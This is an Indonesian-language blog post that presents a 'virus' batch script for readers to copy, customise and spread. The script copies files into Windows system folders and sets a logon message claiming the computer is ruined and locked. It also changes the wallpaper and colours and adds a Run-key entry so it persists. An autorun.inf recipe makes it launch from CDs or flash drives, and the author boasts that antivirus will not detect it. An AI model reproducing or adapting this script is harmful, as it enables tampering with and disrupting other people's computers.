Bikin Virus

Nih sekarang gw kasih contoh virus scrip yang simpel yang pernah gw janjiin dan scrip ini juga bisa lo ubah semau lo. Tapi yang paling keren lagi nih scrip ga bakal ke detect sama antivirus lo (menurut gw), yaudah yang mau nyoba silakan copy-paste aja! tapi inget, scrip nih cuma untuk pembelajaran aja coz gw ga bertanggung jawab sepenuhnya atas apa yang terjadi kalo disalah gunakan! karena ini juga bukan sepenuhnya ide gw. Oc!!!!!!


@echo off
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\system32\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\system32\ /y
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeCaption /d “WARNING MESSAGE FROM LOCAL_HOST(judul title bar)” /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeText /d “I HAVE RUINED YOUR COMPUTER AND YOUR COMPUTER IS LOCKED(pesan pembuat)” /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v WallpaperStyle /d 0 /f
reg add “HKEY_USERS\.DEFAULT\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v nama_terserah /d %systemdrive%\windows\system32\nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe /f
reg add “HKEY_CURRENT_USER/Control Panel/Colors” /v window /d #000000(atau kombinasi warna RGB lain,cari pake Adobe Photoshop) /f


Nah setelah lo copy-paste trus lo save as dengan nama terserah lo yang penting exstensinya ".bat". Tapi sebelum di save as yah lo edit dululah, lo ganti yang didalam kurung ( ) sesuai dengan kemauan lo! misalnya : "copy image_name hacker.bmp %systemdrive%\ /y". Trus baru dah lo save as.

Kalo lo mau tuh scrip autorun sendiri, lo harus buat autorunnya! kayak gini :

[autorun]
open=nama-file.bat


Trus save as "autorun.inf".
"nama-file = nama scrip yang tadi lo save as *.bat".

Oh iya gw lupa autorun nih jalan kalo lo taruh pada direktori yang sama, misalnya lo jadiin CD atau Flashdisk.

#Selamat mencoba ....

1 comment:

Copyright © 2012 komputer-tech
Design by stuff-freeiz